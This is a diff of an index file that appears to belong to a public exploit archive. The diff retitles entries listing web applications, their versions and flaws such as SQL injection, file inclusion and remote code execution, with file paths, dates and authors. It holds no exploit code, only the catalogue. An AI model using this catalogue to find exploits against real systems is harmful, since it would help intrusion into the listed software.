6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injection",2008-07-11,"Nu Am Bani",php,webapps,0 6041,platforms/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 Beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,php,webapps,0 6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo",2008-10-20,StAkeR,php,webapps,0 -6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - (id_cat) SQL Injection",2008-07-11,"Hussin X",php,webapps,0 +6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - 'id_cat' Parameter SQL Injection",2008-07-11,"Hussin X",php,webapps,0 6047,platforms/php/webapps/6047.txt,"Maian Cart 1.1 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 6048,platforms/php/webapps/6048.txt,"Maian Events 2.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 6049,platforms/php/webapps/6049.txt,"Maian Gallery 2.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 6050,platforms/php/webapps/6050.txt,"Maian Greetings 2.1 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 6051,platforms/php/webapps/6051.txt,"Maian Music 1.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 -6053,platforms/php/webapps/6053.php,"Fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution (PHP)",2008-07-12,"Inphex and real",php,webapps,0 -6054,platforms/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution (Perl)",2008-07-12,"Inphex and real",php,webapps,0 +6053,platforms/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Parameter Remote Code Execution (PHP)",2008-07-12,"Inphex and real",php,webapps,0 +6054,platforms/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Parameter Remote Code Execution (Perl)",2008-07-12,"Inphex and real",php,webapps,0 6055,platforms/php/webapps/6055.pl,"Joomla! Component n-forms 1.01 - Blind SQL Injection",2008-07-12,"The Moorish",php,webapps,0 -6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' SQL Injection",2008-07-12,Mr.SQL,php,webapps,0 -6057,platforms/php/webapps/6057.txt,"jsite 1.0 oe - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2008-07-12,S.W.A.T.,php,webapps,0 -6058,platforms/php/webapps/6058.txt,"Avlc Forum - 'vlc_forum.php id' SQL Injection",2008-07-12,"CWH Underground",php,webapps,0 -6060,platforms/php/webapps/6060.php,"Fuzzylime CMS 3.01 - (commrss.php) Remote Code Execution",2008-07-13,"Charles Fol",php,webapps,0 +6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' Parameter SQL Injection",2008-07-12,Mr.SQL,php,webapps,0 +6057,platforms/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,php,webapps,0 +6058,platforms/php/webapps/6058.txt,"Avlc Forum - 'vlc_forum.php' SQL Injection",2008-07-12,"CWH Underground",php,webapps,0 +6060,platforms/php/webapps/6060.php,"Fuzzylime CMS 3.01 - 'commrss.php' Remote Code Execution",2008-07-13,"Charles Fol",php,webapps,0 6061,platforms/php/webapps/6061.txt,"Maian Guestbook 3.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6062,platforms/php/webapps/6062.txt,"Maian Links 3.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6063,platforms/php/webapps/6063.txt,"Maian Recipe 1.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6064,platforms/php/webapps/6064.txt,"Maian Weblog 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6065,platforms/php/webapps/6065.txt,"Maian Uploader 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6066,platforms/php/webapps/6066.txt,"Maian Search 1.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 -6067,platforms/php/webapps/6067.pl,"Ultrastats 0.2.142 - (players-detail.php) Blind SQL Injection",2008-07-13,DNX,php,webapps,0 +6067,platforms/php/webapps/6067.pl,"Ultrastats 0.2.142 - 'players-detail.php' Blind SQL Injection",2008-07-13,DNX,php,webapps,0 6068,platforms/php/webapps/6068.txt,"MFORUM 0.1a - Arbitrary Add Admin",2008-07-13,"CWH Underground",php,webapps,0 6069,platforms/php/webapps/6069.txt,"ITechBids 7.0 gold - Cross-Site Scripting / SQL Injection",2008-07-13,Encrypt3d.M!nd,php,webapps,0 6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 - 'cookie' Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0 -6071,platforms/php/webapps/6071.txt,"CodeDB - 'list.php lang' Local File Inclusion",2008-07-14,cOndemned,php,webapps,0 +6071,platforms/php/webapps/6071.txt,"CodeDB 1.1.1 - 'list.php' Local File Inclusion",2008-07-14,cOndemned,php,webapps,0 6073,platforms/php/webapps/6073.txt,"bilboblog 2.1 - Multiple Vulnerabilities",2008-07-14,BlackH,php,webapps,0 -6074,platforms/php/webapps/6074.txt,"Pluck 4.5.1 - (blogpost) Local File Inclusion (win only)",2008-07-14,BugReport.IR,php,webapps,0 +6074,platforms/php/webapps/6074.txt,"Pluck CMS 4.5.1 - 'blogpost' Parameter Local File Inclusion (win only)",2008-07-14,BugReport.IR,php,webapps,0 6075,platforms/php/webapps/6075.txt,"Galatolo Web Manager 1.3a - Cross-Site Scripting / SQL Injection",2008-07-15,StAkeR,php,webapps,0 6076,platforms/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File Inclusion",2008-07-15,RoMaNcYxHaCkEr,php,webapps,0 -6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - (sourceFolder) Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0 -6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - (arcmonth) SQL Injection",2008-07-15,K-159,php,webapps,0 +6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - 'sourceFolder' Parameter Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0 +6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - 'arcmonth' Parameter SQL Injection",2008-07-15,K-159,php,webapps,0 6080,platforms/php/webapps/6080.txt,"PHP Help Agent 1.1 - (content) Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0 6081,platforms/php/webapps/6081.txt,"Galatolo Web Manager 1.3a - Insecure Cookie Handling",2008-07-15,"Virangar Security",php,webapps,0 6082,platforms/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",php,webapps,0 @@ -19191,7 +19195,7 @@ id,file,description,date,author,platform,type,port 6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - (comment.php mid) SQL Injection",2008-07-25,Mr.SQL,php,webapps,0 6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - (picture.php image_id) SQL Injection",2008-07-25,cOndemned,php,webapps,0 6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0 -6136,platforms/php/webapps/6136.txt,"phpWebNews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0 +6136,platforms/php/webapps/6136.txt,"PHPwebnews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0 6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0 6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0 6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' SQL Injection",2008-07-26,mikeX,php,webapps,0 @@ -19341,7 +19345,7 @@ id,file,description,date,author,platform,type,port 6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0 6369,platforms/php/webapps/6369.py,"Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0 -6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'index.php id' Blind SQL Injection",2008-09-05,JosS,php,webapps,0 +6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'id' Parameter Blind SQL Injection",2008-09-05,JosS,php,webapps,0 6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - (news_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 6374,platforms/php/webapps/6374.txt,"Vastal I-Tech Toner Cart - 'id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 @@ -19432,7 +19436,7 @@ id,file,description,date,author,platform,type,port 6488,platforms/php/webapps/6488.txt,"Diesel Joke Site - 'picture_category.php id' SQL Injection",2008-09-18,SarBoT511,php,webapps,0 6489,platforms/php/webapps/6489.txt,"ProActive CMS - 'template' Local File Inclusion",2008-09-18,r45c4l,php,webapps,0 6490,platforms/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation Attack",2008-09-18,"Neo Anderson",php,webapps,0 -6492,platforms/php/webapps/6492.php,"Pluck 4.5.3 - (update.php) Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0 +6492,platforms/php/webapps/6492.php,"Pluck CMS 4.5.3 - 'update.php' Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0 6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 - 'detail.php' SQL Injection",2008-09-19,"Egypt Coder",php,webapps,0 6495,platforms/php/webapps/6495.txt,"Explay CMS 2.1 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2008-09-19,hodik,php,webapps,0 6499,platforms/php/webapps/6499.txt,"Advanced Electron Forum 1.0.6 - Remote Code Execution",2008-09-20,"GulfTech Security",php,webapps,0 @@ -19953,10 +19957,10 @@ id,file,description,date,author,platform,type,port 7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0 7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - (Authentication Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0 7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 -7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0 +7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - 'serverid' Parameter SQL Injection",2008-11-17,eek,php,webapps,0 7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0 7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,php,webapps,0 -7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0 +7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Parameter Local File Inclusion",2008-11-18,DSecRG,php,webapps,0 7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0 7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 @@ -20013,7 +20017,7 @@ id,file,description,date,author,platform,type,port 7228,platforms/php/webapps/7228.txt,"Clean CMS 1.5 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - (config_path) Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0 7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection",2008-11-25,JosS,php,webapps,0 -7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - (track.php p) Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0 +7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0 7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - (simpleBlog.mdb) Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0 7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - Arbitrary File Upload",2008-11-25,cOndemned,php,webapps,0 7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0 @@ -20047,7 +20051,7 @@ id,file,description,date,author,platform,type,port 7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Authentication Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0 7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0 -7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - (index.php term) SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 +7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - 'term' Parameter SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone - (Authentication Bypass) SQL Injection",2008-11-28,R3d-D3V!L,php,webapps,0 7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro (ID) - Blind SQL Injection",2008-11-28,Stack,php,webapps,0 7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 @@ -20490,7 +20494,7 @@ id,file,description,date,author,platform,type,port 7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection",2009-01-26,fuzion,php,webapps,0 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - Authentication Bypass / SQL Injection",2009-01-26,InjEctOr5,asp,webapps,0 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0 -7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'show_cat2.php grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0 +7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'grid' Parameter SQL Injection",2009-01-26,FeDeReR,php,webapps,0 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0 7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0 @@ -20715,7 +20719,7 @@ id,file,description,date,author,platform,type,port 8255,platforms/php/webapps/8255.txt,"Supernews 1.5 - (valor.php noticia) SQL Injection",2009-03-23,p3s0k!,php,webapps,0 8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 - (get_read.php section) SQL Injection",2009-03-23,dun,php,webapps,0 8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution",2009-03-23,YOUCODE,php,webapps,0 -8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0 +8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - 'module_pages_site.php' Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution",2009-03-23,darkjoker,php,webapps,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Authentication Bypass (SQL Injection) / Arbitrary File Upload",2009-03-23,Mr.Skonnie,php,webapps,0 @@ -20764,7 +20768,7 @@ id,file,description,date,author,platform,type,port 8361,platforms/php/webapps/8361.txt,"Family Connections CMS 1.8.2 - Blind SQL Injection",2009-04-07,"Salvatore Fresta",php,webapps,0 8362,platforms/php/webapps/8362.php,"Lanius CMS 0.5.2 - Arbitrary File Upload",2009-04-07,EgiX,php,webapps,0 8364,platforms/php/webapps/8364.txt,"saspcms 0.9 - Multiple Vulnerabilities",2009-04-08,BugReport.IR,php,webapps,0 -8365,platforms/php/webapps/8365.txt,"Joomla! Component Maian Music 1.2.1 - (category) SQL Injection",2009-04-08,H!tm@N,php,webapps,0 +8365,platforms/php/webapps/8365.txt,"Joomla! Component Maian Music 1.2.1 - 'category' Parameter SQL Injection",2009-04-08,H!tm@N,php,webapps,0 8366,platforms/php/webapps/8366.txt,"Joomla! Component MailTo - (article) SQL Injection",2009-04-08,H!tm@N,php,webapps,0 8367,platforms/php/webapps/8367.txt,"Joomla! Component Cmimarketplace - (viewit) Directory Traversal",2009-04-08,H!tm@N,php,webapps,0 8372,platforms/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0 @@ -20958,7 +20962,7 @@ id,file,description,date,author,platform,type,port 8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' Parameter SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 8713,platforms/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0 8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,php,webapps,0 -8715,platforms/php/webapps/8715.txt,"Pluck 4.6.2 - (langpref) Local File Inclusion",2009-05-18,ahmadbady,php,webapps,0 +8715,platforms/php/webapps/8715.txt,"Pluck CMS 4.6.2 - 'langpref' Parameter Local File Inclusion",2009-05-18,ahmadbady,php,webapps,0 8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin",2009-05-18,ahmadbady,php,webapps,0 8718,platforms/php/webapps/8718.txt,"douran portal 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0 8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password",2009-05-18,Abysssec,asp,webapps,0 @@ -21150,7 +21154,7 @@ id,file,description,date,author,platform,type,port 8978,platforms/php/webapps/8978.txt,"Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption (PoC)",2009-06-17,StAkeR,php,webapps,0 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion",2009-06-17,YEnH4ckEr,php,webapps,0 8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Blind SQL Injection",2009-06-17,YEnH4ckEr,php,webapps,0 -8981,platforms/php/webapps/8981.txt,"phportal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0 +8981,platforms/php/webapps/8981.txt,"PHPortal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0 8984,platforms/php/webapps/8984.txt,"CMS buzz - (Cross-Site Scripting / Password Change/HTML Injection) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 - (Authentication Bypass) Insecure Cookie Handling",2009-06-22,HxH,cgi,webapps,0 8988,platforms/php/webapps/8988.txt,"pc4 Uploader 10.0 - Remote File Disclosure",2009-06-22,Qabandi,php,webapps,0 @@ -21160,7 +21164,7 @@ id,file,description,date,author,platform,type,port 8994,platforms/php/webapps/8994.txt,"AWScripts Gallery Search Engine 1.x - Insecure Cookie",2009-06-22,TiGeR-Dz,php,webapps,0 8995,platforms/php/webapps/8995.txt,"Campsite 3.3.0 RC1 - Multiple Remote File Inclusion",2009-06-22,CraCkEr,php,webapps,0 8996,platforms/php/webapps/8996.txt,"Gravy Media Photo Host 1.0.8 - Local File Disclosure",2009-06-22,Lo$er,php,webapps,0 -8997,platforms/php/webapps/8997.txt,"Kasseler CMS - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-22,S(r1pt,php,webapps,0 +8997,platforms/php/webapps/8997.txt,"Kasseler CMS - File Disclosure / Cross-Site Scripting",2009-06-22,S(r1pt,php,webapps,0 8998,platforms/php/webapps/8998.txt,"SourceBans 1.4.2 - Arbitrary Change Admin Email",2009-06-22,"Mr. Anonymous",php,webapps,0 8999,platforms/php/webapps/8999.txt,"Joomla! Component com_tickets 2.1 - 'id' SQL Injection",2009-06-22,"Chip d3 bi0s",php,webapps,0 9000,platforms/php/webapps/9000.txt,"RS-CMS 2.1 - (key) SQL Injection",2009-06-22,Mr.tro0oqy,php,webapps,0 @@ -21424,7 +21428,7 @@ id,file,description,date,author,platform,type,port 9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection",2009-08-18,NoGe,php,webapps,0 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0 -9451,platforms/php/webapps/9451.txt,"DreamPics Builder - (exhibition_id) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 +9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0 @@ -22423,7 +22427,7 @@ id,file,description,date,author,platform,type,port 11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,php,webapps,0 11504,platforms/php/webapps/11504.txt,"Amelia CMS - SQL Injection",2010-02-19,Ariko-Security,php,webapps,0 11507,platforms/php/webapps/11507.txt,"WSC CMS - (Bypass) SQL Injection",2010-02-19,Phenom,php,webapps,0 -11508,platforms/php/webapps/11508.txt,"Trixbox 2.2.4 - PhonecDirectory.php SQL Injection",2010-02-19,NorSlacker,php,webapps,0 +11508,platforms/php/webapps/11508.txt,"Fonality trixbox 2.2.4 - 'PhonecDirectory.php' SQL Injection",2010-02-19,NorSlacker,php,webapps,0 11509,platforms/php/webapps/11509.txt,"PHPKit 1.6.1 - 'mailer.php' SQL Injection",2010-02-19,"Easy Laster",php,webapps,0 11511,platforms/php/webapps/11511.txt,"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion",2010-02-19,kaMtiEz,php,webapps,0 11515,platforms/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure",2010-02-20,ViRuSMaN,php,webapps,0 @@ -22663,7 +22667,7 @@ id,file,description,date,author,platform,type,port 11894,platforms/php/webapps/11894.txt,"CmsFaethon 2.2.0 (ultimate.7z) - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0 11895,platforms/php/webapps/11895.txt,"CyberCMS - SQL Injection",2010-03-26,hc0de,php,webapps,0 11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - Cross-Site Request Forgery (Add Admin)",2010-03-26,bi0,php,webapps,0 -11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite - (Module Jokes) SQL Injection",2010-03-26,Sc0rpi0n,php,webapps,0 +11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite Module Jokes - SQL Injection",2010-03-26,Sc0rpi0n,php,webapps,0 11898,platforms/php/webapps/11898.py,"Date & Sex Vor und Rückwärts Auktions System 2 - Blind SQL Injection",2010-03-27,"Easy Laster",php,webapps,0 11899,platforms/php/webapps/11899.html,"AdaptCMS Lite 1.5 2009-07-07 - Exploit",2010-03-27,ITSecTeam,php,webapps,0 11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multiple Local File Inclusions",2010-03-27,ITSecTeam,php,webapps,0 @@ -23484,7 +23488,7 @@ id,file,description,date,author,platform,type,port 14026,platforms/php/webapps/14026.txt,"AbleDating script - SQL Injection",2010-06-24,JaMbA,php,webapps,0 14027,platforms/php/webapps/14027.txt,"ActiveCollab 2.3.0 - Local File Inclusion / Directory Traversal",2010-06-24,"Jose Carlos de Arriba",php,webapps,0 14028,platforms/php/webapps/14028.txt,"2DayBiz B2B Portal Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0 -14030,platforms/asp/webapps/14030.pl,"PHPortal_1.2 - (gunaysoft.php) Remote File Inclusion",2010-06-24,Ma3sTr0-Dz,asp,webapps,0 +14030,platforms/asp/webapps/14030.pl,"PHPortal 1.2 - 'gunaysoft.php' Remote File Inclusion",2010-06-24,Ma3sTr0-Dz,asp,webapps,0 14033,platforms/php/webapps/14033.txt,"Big Forum 5.2 - Arbitrary File Upload / Local File Inclusion",2010-06-24,"Zer0 Thunder",php,webapps,0 14035,platforms/php/webapps/14035.txt,"Big Forum - 'forum.php?id' SQL Injection",2010-06-24,JaMbA,php,webapps,0 14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script - SQL Injection / Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps,0 @@ -24483,7 +24487,7 @@ id,file,description,date,author,platform,type,port 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16901,platforms/php/webapps/16901.rb,"PAJAX - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,php,webapps,0 16902,platforms/php/webapps/16902.rb,"CakePHP 1.3.5 / 1.2.8 - Cache Corruption Exploit (Metasploit)",2011-01-14,Metasploit,php,webapps,0 -16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion (Metasploit)",2011-01-08,Metasploit,php,webapps,0 +16904,platforms/php/webapps/16904.rb,"Fonality trixbox CE 2.6.1 - 'langChoice' Parameter Local File Inclusion (Metasploit)",2011-01-08,Metasploit,php,webapps,0 16905,platforms/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit)",2009-12-26,Metasploit,cgi,webapps,0 16906,platforms/php/webapps/16906.rb,"Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,php,webapps,0 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,hardware,webapps,0 @@ -24505,7 +24509,7 @@ id,file,description,date,author,platform,type,port 16941,platforms/asp/webapps/16941.txt,"EzPub Simple Classic ASP CMS - SQL Injection",2011-03-08,p0pc0rn,asp,webapps,0 16947,platforms/php/webapps/16947.txt,"WordPress Plugin GRAND Flash Album Gallery 0.55 - Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection",2011-03-09,Shamus,php,webapps,0 -16949,platforms/php/webapps/16949.php,"maian weblog 4.0 - Blind SQL Injection",2011-03-09,mr_me,php,webapps,0 +16949,platforms/php/webapps/16949.php,"Maian Weblog 4.0 - Blind SQL Injection",2011-03-09,mr_me,php,webapps,0 16950,platforms/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,"Khashayar Fereidani",php,webapps,0 16953,platforms/asp/webapps/16953.txt,"Luch Web Designer - Multiple SQL Injections",2011-03-10,p0pc0rn,asp,webapps,0 16954,platforms/php/webapps/16954.txt,"Keynect eCommerce - SQL Injection",2011-03-10,"Arturo Zamora",php,webapps,0 @@ -24711,7 +24715,7 @@ id,file,description,date,author,platform,type,port 17423,platforms/php/webapps/17423.txt,"WordPress Plugin WPtouch 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 17426,platforms/php/webapps/17426.txt,"iGiveTest 2.1.0 - 